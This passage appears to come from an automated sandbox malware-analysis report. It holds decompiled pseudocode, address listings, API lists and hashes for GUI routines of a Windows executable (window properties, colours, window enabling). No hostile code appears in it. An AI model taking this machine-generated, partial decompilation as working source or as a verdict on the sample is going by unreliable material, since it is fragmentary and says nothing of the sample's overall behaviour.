                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t140 = _t137 - 1;
                                                                                                                                                  								__eflags = _t140;
                                                                                                                                                  								_push(_v8);
                                                                                                                                                  								if(_t140 == 0) {
                                                                                                                                                  									 *(_t148 + 0x2c) = 1;
                                                                                                                                                  									_push(0x3333);
                                                                                                                                                  									goto L38;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t140 != 1;
                                                                                                                                                  								if(_t140 != 1) {
                                                                                                                                                  									goto L37;
                                                                                                                                                  								} else {
                                                                                                                                                  									 *(_t148 + 0x2c) = 1;
                                                                                                                                                  									_push(0x3334);
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_t142 = _t134 - 1;
                                                                                                                                                  							if(_t142 == 0) {
                                                                                                                                                  								__eflags = _a12 - _t155;
                                                                                                                                                  								if(_a12 != _t155) {
                                                                                                                                                  									E00405685(_t157, 0x3330, _v8);
                                                                                                                                                  								}
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t142 != 0xa) {
                                                                                                                                                  								goto L104;
                                                                                                                                                  							}
                                                                                                                                                  							goto L19;
                                                                                                                                                  						} else {
                                                                                                                                                  							L9:
                                                                                                                                                  							_t96 =  *_t98(_a4, _a8, _a12, _t156);
                                                                                                                                                  							if(_t96 != 0xe0e0e0e1) {
                                                                                                                                                  								goto L105;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t155 = 0;
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t98 =  *(_t148 + 0xc);
                                                                                                                                                  					if(_t98 == 0) {
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  					goto L9;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_t145 = GetPropA(_v12, "PB_WindowID");
                                                                                                                                                  					_v8 = _t145;
                                                                                                                                                  					if(_t145 != 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t147 = GetParent(_v12);
                                                                                                                                                  					_v12 = _t147;
                                                                                                                                                  					if(_t147 != 0) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				if(_v12 == _t148) {
                                                                                                                                                  					goto L6;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v8 = _v8 - 1;
                                                                                                                                                  					_t148 = E00406690( *0x40b42c, _v8);
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  			}




































                                                                                                                                                  0x004056fe
                                                                                                                                                  0x00405700
                                                                                                                                                  0x00405705
                                                                                                                                                  0x0040570c
                                                                                                                                                  0x00405714
                                                                                                                                                  0x0040571e
                                                                                                                                                  0x00405b1c
                                                                                                                                                  0x00405b1c
                                                                                                                                                  0x00405b1c
                                                                                                                                                  0x00405724
                                                                                                                                                  0x00405729
                                                                                                                                                  0x0040572c
                                                                                                                                                  0x0040576d
                                                                                                                                                  0x0040576d
                                                                                                                                                  0x0040576d
                                                                                                                                                  0x0040576d
                                                                                                                                                  0x00405771
                                                                                                                                                  0x00405771
                                                                                                                                                  0x00405775
                                                                                                                                                  0x00405801
                                                                                                                                                  0x00405801
                                                                                                                                                  0x00405804
                                                                                                                                                  0x00405806
                                                                                                                                                  0x0040579b
                                                                                                                                                  0x0040579b
                                                                                                                                                  0x004057a3
                                                                                                                                                  0x004057a6
                                                                                                                                                  0x004057ad
                                                                                                                                                  0x004057b0
                                                                                                                                                  0x00405a15
                                                                                                                                                  0x00405a17
                                                                                                                                                  0x00405ada
                                                                                                                                                  0x00405ada
                                                                                                                                                  0x00405adc
                                                                                                                                                  0x00405b0c
                                                                                                                                                  0x00405b0f
                                                                                                                                                  0x00405b0f
                                                                                                                                                  0x00405b12
                                                                                                                                                  0x00405b12
                                                                                                                                                  0x00405b15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405b15
                                                                                                                                                  0x00405ade
                                                                                                                                                  0x00405ade
                                                                                                                                                  0x00405adf
                                                                                                                                                  0x00405b01
                                                                                                                                                  0x00405b08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405b08
                                                                                                                                                  0x00405ae1
                                                                                                                                                  0x00405ae4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ae6
                                                                                                                                                  0x00405ae6
                                                                                                                                                  0x00405ae7
                                                                                                                                                  0x00405aea
                                                                                                                                                  0x00405aed
                                                                                                                                                  0x00405af0
                                                                                                                                                  0x00405af1
                                                                                                                                                  0x00405af9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405af9
                                                                                                                                                  0x00405a1d
                                                                                                                                                  0x00405ac7
                                                                                                                                                  0x00405ace
                                                                                                                                                  0x00405ad0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ad0
                                                                                                                                                  0x00405a23
                                                                                                                                                  0x00405a28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405a2e
                                                                                                                                                  0x00405a33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405a39
                                                                                                                                                  0x00405a3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405a44
                                                                                                                                                  0x00405a49
                                                                                                                                                  0x00405ab9
                                                                                                                                                  0x00405984
                                                                                                                                                  0x00405984
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405984
                                                                                                                                                  0x00405a4b
                                                                                                                                                  0x00405a50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405a56
                                                                                                                                                  0x00405a5f
                                                                                                                                                  0x00405a66
                                                                                                                                                  0x00405a68
                                                                                                                                                  0x00405a76
                                                                                                                                                  0x00405a7c
                                                                                                                                                  0x00405a8a
                                                                                                                                                  0x00405a90
                                                                                                                                                  0x00405a97
                                                                                                                                                  0x00405a9d
                                                                                                                                                  0x00405aa8
                                                                                                                                                  0x00405a9f
                                                                                                                                                  0x00405a9f
                                                                                                                                                  0x00405a9f
                                                                                                                                                  0x00405a92
                                                                                                                                                  0x00405a92
                                                                                                                                                  0x00405a92
                                                                                                                                                  0x00405a7e
                                                                                                                                                  0x00405a7e
                                                                                                                                                  0x00405a7e
                                                                                                                                                  0x00405a6a
                                                                                                                                                  0x00405a6a
                                                                                                                                                  0x00405a6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405a68
                                                                                                                                                  0x004057bb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004057c1
                                                                                                                                                  0x004057c4
                                                                                                                                                  0x004058e8
                                                                                                                                                  0x004058eb
                                                                                                                                                  0x004059ea
                                                                                                                                                  0x004059ec
                                                                                                                                                  0x004059f2
                                                                                                                                                  0x004059f5
                                                                                                                                                  0x00405a05
                                                                                                                                                  0x00405a05
                                                                                                                                                  0x004059f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004059ec
                                                                                                                                                  0x004058f1
                                                                                                                                                  0x004058f4
                                                                                                                                                  0x0040599d
                                                                                                                                                  0x0040599f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004059a5
                                                                                                                                                  0x004059a9
                                                                                                                                                  0x004059ac
                                                                                                                                                  0x004059b1
                                                                                                                                                  0x004059b1
                                                                                                                                                  0x004059b4
                                                                                                                                                  0x004059b8
                                                                                                                                                  0x004059bb
                                                                                                                                                  0x004059c0
                                                                                                                                                  0x004059c0
                                                                                                                                                  0x004059c3
                                                                                                                                                  0x004059c7
                                                                                                                                                  0x004059ca
                                                                                                                                                  0x004059cf
                                                                                                                                                  0x004059cf
                                                                                                                                                  0x004059d2
                                                                                                                                                  0x004059d6
                                                                                                                                                  0x004059d9
                                                                                                                                                  0x004059e2
                                                                                                                                                  0x004059e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004059d9
                                                                                                                                                  0x004058fa
                                                                                                                                                  0x004058fd
                                                                                                                                                  0x0040598d
                                                                                                                                                  0x0040598e
                                                                                                                                                  0x00405991
                                                                                                                                                  0x00405993
                                                                                                                                                  0x00405996
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405996
                                                                                                                                                  0x00405908
                                                                                                                                                  0x0040590a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405910
                                                                                                                                                  0x0040591a
                                                                                                                                                  0x00405922
                                                                                                                                                  0x00405927
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040592b
                                                                                                                                                  0x0040592e
                                                                                                                                                  0x00405930
                                                                                                                                                  0x00405958
                                                                                                                                                  0x0040595b
                                                                                                                                                  0x00405954
                                                                                                                                                  0x00405954
                                                                                                                                                  0x0040597d
                                                                                                                                                  0x0040597d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040597d
                                                                                                                                                  0x0040595d
                                                                                                                                                  0x00405962
                                                                                                                                                  0x0040596d
                                                                                                                                                  0x00405972
                                                                                                                                                  0x0040597b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040597b
                                                                                                                                                  0x00405974
                                                                                                                                                  0x00405966
                                                                                                                                                  0x00405966
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405966
                                                                                                                                                  0x00405964
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405964
                                                                                                                                                  0x00405935
                                                                                                                                                  0x0040593c
                                                                                                                                                  0x0040593f
                                                                                                                                                  0x00405945
                                                                                                                                                  0x0040594a
                                                                                                                                                  0x0040594c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040594e
                                                                                                                                                  0x0040594e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040594e
                                                                                                                                                  0x004057ca
                                                                                                                                                  0x00405891
                                                                                                                                                  0x00405893
                                                                                                                                                  0x00405895
                                                                                                                                                  0x00405899
                                                                                                                                                  0x004058c1
                                                                                                                                                  0x004058c4
                                                                                                                                                  0x004058c6
                                                                                                                                                  0x004058c8
                                                                                                                                                  0x004058cb
                                                                                                                                                  0x004058cd
                                                                                                                                                  0x004058d5
                                                                                                                                                  0x004058d5
                                                                                                                                                  0x004058cd
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x004058a2
                                                                                                                                                  0x004058b2
                                                                                                                                                  0x004058b8
                                                                                                                                                  0x004058b8
                                                                                                                                                  0x00405899
                                                                                                                                                  0x004058de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058de
                                                                                                                                                  0x004057d0
                                                                                                                                                  0x004057d3
                                                                                                                                                  0x004057e5
                                                                                                                                                  0x004057e8
                                                                                                                                                  0x004057f5
                                                                                                                                                  0x004057fa
                                                                                                                                                  0x004057fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004057e8
                                                                                                                                                  0x004057d6
                                                                                                                                                  0x004057d7
                                                                                                                                                  0x00405830
                                                                                                                                                  0x00405833
                                                                                                                                                  0x00405821
                                                                                                                                                  0x00405821
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405821
                                                                                                                                                  0x00405835
                                                                                                                                                  0x00405838
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405841
                                                                                                                                                  0x00405841
                                                                                                                                                  0x00405843
                                                                                                                                                  0x0040586a
                                                                                                                                                  0x0040586d
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405884
                                                                                                                                                  0x00405884
                                                                                                                                                  0x00405886
                                                                                                                                                  0x00405886
                                                                                                                                                  0x00405887
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040586f
                                                                                                                                                  0x0040586f
                                                                                                                                                  0x00405872
                                                                                                                                                  0x00405872
                                                                                                                                                  0x00405872
                                                                                                                                                  0x00405876
                                                                                                                                                  0x0040587b
                                                                                                                                                  0x0040587b
                                                                                                                                                  0x0040587c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040587c
                                                                                                                                                  0x0040586d
                                                                                                                                                  0x00405845
                                                                                                                                                  0x00405845
                                                                                                                                                  0x00405846
                                                                                                                                                  0x00405849
                                                                                                                                                  0x0040585c
                                                                                                                                                  0x00405863
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405863
                                                                                                                                                  0x0040584b
                                                                                                                                                  0x0040584c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040584e
                                                                                                                                                  0x0040584e
                                                                                                                                                  0x00405855
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405855
                                                                                                                                                  0x0040584c
                                                                                                                                                  0x004057d9
                                                                                                                                                  0x004057da
                                                                                                                                                  0x0040580d
                                                                                                                                                  0x00405811
                                                                                                                                                  0x0040581c
                                                                                                                                                  0x0040581c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405811
                                                                                                                                                  0x004057df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405808
                                                                                                                                                  0x00405782
                                                                                                                                                  0x0040578c
                                                                                                                                                  0x00405793
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405799
                                                                                                                                                  0x00405799
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405799
                                                                                                                                                  0x00405793
                                                                                                                                                  0x00405806
                                                                                                                                                  0x0040577b
                                                                                                                                                  0x00405780
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040572e
                                                                                                                                                  0x0040572e
                                                                                                                                                  0x00405736
                                                                                                                                                  0x0040573e
                                                                                                                                                  0x00405741
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405746
                                                                                                                                                  0x0040574e
                                                                                                                                                  0x00405751
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405751
                                                                                                                                                  0x00405756
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405758
                                                                                                                                                  0x00405758
                                                                                                                                                  0x00405769
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405769

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                                                                                                                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                                                                                                                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                                                                                                                                    • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                                                                                                                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                                                                                                                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                                                                                                                                    • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                                                                                                                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                                                                                                                                    • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                                                                                                                                    • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                                                                                                                                  • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                                                                                                                                  • GetParent.USER32(?), ref: 00405746
                                                                                                                                                  • GetClientRect.USER32(?,00000000), ref: 004058A2
                                                                                                                                                  • FillRect.USER32(?,00000000,?), ref: 004058B2
                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                                                                                                                                  • EnumChildWindows.USER32(?,004056D9,00000000), ref: 00405A05
                                                                                                                                                  • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureChildClientEnumFillInfoParametersParentPropStateWindows
                                                                                                                                                  • String ID: PB_WindowID
                                                                                                                                                  • API String ID: 3162925107-1508741625
                                                                                                                                                  • Opcode ID: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                                                                                                                                  • Instruction ID: 29e404874b04c4d69bc6432aaff022b43f6243613acb16a20f2353146ae1e986
                                                                                                                                                  • Opcode Fuzzy Hash: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                                                                                                                                  • Instruction Fuzzy Hash: FAB1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BF845B62D0D3399A91EF5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040384E(struct HWND__* _a4) {
                                                                                                                                                  				long _t3;
                                                                                                                                                  				struct HWND__* _t16;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t16 = _a4;
                                                                                                                                                  				_t3 = GetWindowThreadProcessId(_t16, 0);
                                                                                                                                                  				if(_t3 == GetCurrentThreadId() && IsWindowVisible(_t16) != 0 && IsWindowEnabled(_t16) != 0 && _t16 != GetForegroundWindow()) {
                                                                                                                                                  					EnableWindow(_t16, 0);
                                                                                                                                                  					_push(0x10);
                                                                                                                                                  					_t18 = E004067DA(0x40b1c0);
                                                                                                                                                  					 *(_t18 + 4) = _t16;
                                                                                                                                                  					 *_t18 = GetCurrentThreadId();
                                                                                                                                                  				}
                                                                                                                                                  				return 1;
                                                                                                                                                  			}






                                                                                                                                                  0x00403851
                                                                                                                                                  0x00403858
                                                                                                                                                  0x0040386a
                                                                                                                                                  0x0040388f
                                                                                                                                                  0x00403895
                                                                                                                                                  0x004038a2
                                                                                                                                                  0x004038a5
                                                                                                                                                  0x004038aa
                                                                                                                                                  0x004038aa
                                                                                                                                                  0x004038b2

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403866
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040386D
                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00403878
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00403882
                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0040388F
                                                                                                                                                    • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,?,00406649), ref: 004067E6
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2983394722-0
                                                                                                                                                  • Opcode ID: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                                                                                                                                  • Instruction ID: b1902f0b285d8ff1f38c9be8955405961f45d1445ca6c4829f96fecf42db4020
                                                                                                                                                  • Opcode Fuzzy Hash: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                                                                                                                                  • Instruction Fuzzy Hash: 06F0F9322047109BE321BF75AD88B2F7AF8EF45B61B14843AF541F3291DB38D851966E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004042DD(struct HWND__** _a4, intOrPtr _a12, struct HDC__* _a16) {
                                                                                                                                                  				long _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				struct HDC__* _t19;
                                                                                                                                                  				struct HWND__** _t24;
                                                                                                                                                  				struct HWND__* _t25;
                                                                                                                                                  
                                                                                                                                                  				_t24 = _a4;
                                                                                                                                                  				_t25 = 0xd0d0d0d1;
                                                                                                                                                  				if(_a12 == 0x133 || _a12 == 0x138 && IsWindowEnabled( *_t24) != 0) {
                                                                                                                                                  					_t9 = _t24[5];
                                                                                                                                                  					_t19 = _a16;
                                                                                                                                                  					if(_t9 != 0xffffffff) {
                                                                                                                                                  						SetTextColor(_t19, _t9);
                                                                                                                                                  						if(_t24[4] == 0xffffffff) {
                                                                                                                                                  							SetBkColor(_t19, GetSysColor(0x14));
                                                                                                                                                  							_t25 = GetSysColorBrush(0x14);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t10 = _t24[4];
                                                                                                                                                  					if(_t10 != 0xffffffff) {
                                                                                                                                                  						SetBkColor(_t19, _t10);
                                                                                                                                                  						_t25 = _t24[6];
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t25;
                                                                                                                                                  			}








                                                                                                                                                  0x004042e7
                                                                                                                                                  0x004042eb
                                                                                                                                                  0x004042f0
                                                                                                                                                  0x00404308
                                                                                                                                                  0x0040430f
                                                                                                                                                  0x0040431a
                                                                                                                                                  0x0040431e
                                                                                                                                                  0x00404328
                                                                                                                                                  0x00404334
                                                                                                                                                  0x0040433e
                                                                                                                                                  0x0040433e
                                                                                                                                                  0x00404328
                                                                                                                                                  0x00404340
                                                                                                                                                  0x00404346
                                                                                                                                                  0x0040434a
                                                                                                                                                  0x0040434c
                                                                                                                                                  0x0040434c
                                                                                                                                                  0x00404350
                                                                                                                                                  0x00404355

                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowEnabled.USER32(00000133), ref: 004042FE
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0040431E
                                                                                                                                                  • GetSysColor.USER32(00000014), ref: 0040432C
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00404334
                                                                                                                                                  • GetSysColorBrush.USER32(00000014), ref: 00404338
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040434A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushEnabledTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3110319690-0
                                                                                                                                                  • Opcode ID: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                                                                                                                                  • Instruction ID: 3bac33a7e9d7aff12e56e7c95b9a227e0688ac08b885ac0313a6761ddb88b25f
                                                                                                                                                  • Opcode Fuzzy Hash: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                                                                                                                                  • Instruction Fuzzy Hash: F2012171200305AFD620AB69AC48957B3FCEB84331F045B3AFA65E32E1C774EC158A26
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004047BB(void* __ecx, void* _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _t16;
                                                                                                                                                  				struct HWND__* _t22;
                                                                                                                                                  				struct HWND__* _t24;
                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                  				struct HWND__* _t32;
                                                                                                                                                  
                                                                                                                                                  				_t16 = E0040642D( *0x40b428);
                                                                                                                                                  				_t32 = _a8;
                                                                                                                                                  				_v8 = _t16;
                                                                                                                                                  				if(_a4 == 0xffffffff) {
                                                                                                                                                  					_a4 = _t32;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = _a12;
                                                                                                                                                  				_t32->i = _t24;
                                                                                                                                                  				 *((intOrPtr*)(_t32 + 4)) = _a16;
                                                                                                                                                  				 *((intOrPtr*)(_t32 + 0xc)) = SetWindowLongA(_t24, 0xfffffffc, E00404714);
                                                                                                                                                  				SetWindowLongA(_t24, 0xfffffff4, _a4);
                                                                                                                                                  				SetPropA(_t24, "PB_ID", _a4);
                                                                                                                                                  				_t29 = _v8;
                                                                                                                                                  				SendMessageA(_t24, 0x30,  *(_t29 + 8), 1);
                                                                                                                                                  				 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
                                                                                                                                                  				_t22 = _t32;
                                                                                                                                                  				if(_a4 != _t32) {
                                                                                                                                                  					_t22 = _t24;
                                                                                                                                                  				}
                                                                                                                                                  				return _t22;
                                                                                                                                                  			}









                                                                                                                                                  0x004047c8
                                                                                                                                                  0x004047d1
                                                                                                                                                  0x004047d4
                                                                                                                                                  0x004047d7
                                                                                                                                                  0x004047d9
                                                                                                                                                  0x004047d9
                                                                                                                                                  0x004047dc
                                                                                                                                                  0x004047f0
                                                                                                                                                  0x004047f2
                                                                                                                                                  0x004047fa
                                                                                                                                                  0x00404800
                                                                                                                                                  0x0040480b
                                                                                                                                                  0x00404811
                                                                                                                                                  0x0040481c
                                                                                                                                                  0x00404822
                                                                                                                                                  0x00404829
                                                                                                                                                  0x0040482b
                                                                                                                                                  0x0040482d
                                                                                                                                                  0x0040482d
                                                                                                                                                  0x00404833

                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowLongA.USER32(000000FF,000000FC,00404714), ref: 004047F5
                                                                                                                                                  • SetWindowLongA.USER32(000000FF,000000F4,000000FF), ref: 00404800
                                                                                                                                                  • SetPropA.USER32(000000FF,PB_ID,000000FF), ref: 0040480B
                                                                                                                                                  • SendMessageA.USER32(000000FF,00000030,000000FF,00000001), ref: 0040481C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongWindow$MessagePropSend
                                                                                                                                                  • String ID: PB_ID
                                                                                                                                                  • API String ID: 499798845-4173770792
